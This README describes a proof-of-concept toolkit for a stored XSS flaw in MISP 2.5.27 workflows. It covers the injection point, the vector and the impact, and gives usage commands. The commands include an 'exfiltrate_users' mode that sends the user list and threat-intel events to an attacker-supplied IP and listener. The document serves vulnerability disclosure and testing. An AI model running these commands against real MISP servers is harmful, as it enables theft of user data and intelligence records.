# MISP 2.5.27 Stored XSS Exploitation

**Vulnerability Identifier**: GCVE-1-2025-0031  
**Target**: MISP (Malware Information Sharing Platform) <= 2.5.27  
**Type**: Stored Cross-Site Scripting (XSS)  
**Component**: Workflows
**Author**: [Franck FERMAN](https://github.com/franckferman)

---

## Overview

This toolkit provides a Proof of Concept (PoC) for a critical Stored XSS vulnerability identified in MISP 2.5.27. The vulnerability allows an authenticated attacker to inject malicious JavaScript into a MISP Workflow. This script persists in MISP and is executed in the browser of any user (including Administrators) who views the affected workflow graph.

This repository contains two robust Python scripts to demonstrate the impact:
*   `MISP_2_5_27_Stored_XSS_Exploit_PoC_Franck_FERMAN.py`: A full-featured exploitation suite with multiple modes (Alert, Console Logging, Data Exfiltration).
*   `Snippets/MISP_2_5_27_Stored_XSS_Exploit_PoC_Alert_Franck_FERMAN`: A lightweight, streamlined version strictly for Proof of Concept (pops an `alert()`).

## Technical Details

### The Vulnerability
The issue lies in how MISP handles the rendering of Workflow graphs. Specifically, the "Trigger Name" field in user-defined workflows is not properly sanitized before being passed to the **doT.js** template engine for rendering the visual graph elements.

*   **Injection Point**: `/workflows/edit/{id}` (POST request to modify graph data).
*   **Vector**: The `name` parameter within the workflow node JSON data.
*   **Execution Context**: The payload persists in the MISP database. When a user navigates to `/workflows/view/{id}`, the application retrieves the graph data and renders it. The injected HTML/JS payload inside the `name` field is rendered directly into the DOM without escaping, triggering execution.

### Impact
*   **Account Takeover**: Depending on the context, the strategy employed, the sequence of attacks, and the MISP configuration.
*   **Privilege Escalation**: Depending on the context, the strategy employed, the sequence of attacks, and the MISP configuration.
*   **Data Exfiltration**: Extracting sensitive threat intelligence events, user lists, and organization details (demonstrated in `MISP_2_5_27_Stored_XSS_Exploit_PoC_Franck_FERMAN.py`).

---

## Usage

No external dependencies are required. The tools use Python's standard library.

### 1. Minimal PoC (`MISP_2_5_27_Stored_XSS_Exploit_PoC_Alert_Franck_FERMAN.py`)
Use this for a quick verification. It creates a workflow and injects a simple alert box.

```bash
# Standard usage
python3 Snippets/MISP_2_5_27_Stored_XSS_Exploit_PoC_Alert_Franck_FERMAN.py https://misp.target.com "YOUR_API_KEY"
```

### 2. Advanced Exploit Suite (`MISP_2_5_27_Stored_XSS_Exploit_PoC_Franck_FERMAN.py`)
Use this to demonstrate real-world impact (e.g., exfiltrating user data).

```bash
# LIST all available modes
python3 MISP_2_5_27_Stored_XSS_Exploit_PoC_Franck_FERMAN.py --help

# Mode: Exfiltrate Users List
# 1. Start a local listener
python3 -m http.server 8000

# 2. Run the exploit
python3 MISP_2_5_27_Stored_XSS_Exploit_PoC_Franck_FERMAN.py https://misp.target.com "YOUR_API_KEY" --mode exfiltrate_users --attacker YOUR_IP:8000
```

**Available Modes:**
*   `alert`: Display simple alert.
*   `console_info`: Log current user details (Email, Role) to the browser console.
*   `exfiltrate_users`: **(Admin Only)** Extract the full user list (ID, Org, Email) and send it to the attacker's server.
*   `exfiltrate_events`: Extract recent MISP events/attributes and send them to the attacker.

---

## Proof of Concept Video

_Editing in progress_.

---

## Disclaimer

This code is provided for **educational and defensive purposes only**. It is intended to help security professionals understand, identify, and remediate vulnerabilities in their own environments.
*   Do not use this against systems you do not own or do not have explicit permission to test.
*   The author (Franck FERMAN) is not responsible for any misuse or damage caused by this toolkit.

---

**Franck FERMAN**  
CyberSecurity Engineer | Offensive & Defensive  
[GitHub](https://github.com/franckferman) | [LinkedIn](https://linkedin.com/in/franckferman)
